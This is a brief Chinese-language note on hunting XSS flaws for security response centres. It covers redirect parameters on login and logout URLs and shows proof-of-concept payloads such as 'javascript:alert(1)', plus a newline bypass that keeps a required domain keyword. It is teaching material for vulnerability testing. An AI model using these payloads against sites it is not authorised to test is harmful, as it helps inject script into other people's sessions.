src挖掘-xss漏洞

漏洞点:url跳转参数,登录url跳转, 退出 注意点:注意url参数 redirect URL redirect_url等参数

  1. 前端302跳转可造成xss漏洞window.location
正常的url:https://guozhi1.github.io/login?url=http://test.com

我们可以尝试https://guozhi1.github.io/login?url=javascript:alert(1)

如果失败了,就观察与正常的url有什么不同是不是需要test.com关键字

可以尝试这个https://guozhi1.github.io/login?url=javascript://test.com/%0aalert(1)

如果不能跳转就看他和正常的url有什么不同